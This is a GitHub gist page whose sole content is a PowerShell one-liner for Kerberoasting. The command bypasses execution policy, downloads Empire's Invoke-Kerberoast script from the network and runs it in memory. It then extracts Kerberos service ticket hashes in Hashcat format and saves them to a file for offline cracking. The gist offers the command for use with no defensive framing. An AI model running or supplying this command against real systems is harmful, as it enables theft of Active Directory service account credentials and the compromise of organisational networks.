Skip to content

Instantly share code, notes, and snippets.

@cyberlama
Created January 25, 2021 21:31
Show Gist options
  • Save cyberlama/72273c385a3530fce6bb8bd3b5e272a3 to your computer and use it in GitHub Desktop.
Save cyberlama/72273c385a3530fce6bb8bd3b5e272a3 to your computer and use it in GitHub Desktop.
powershell -ep bypass -c "IEX (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1') ; Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash0.txt"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment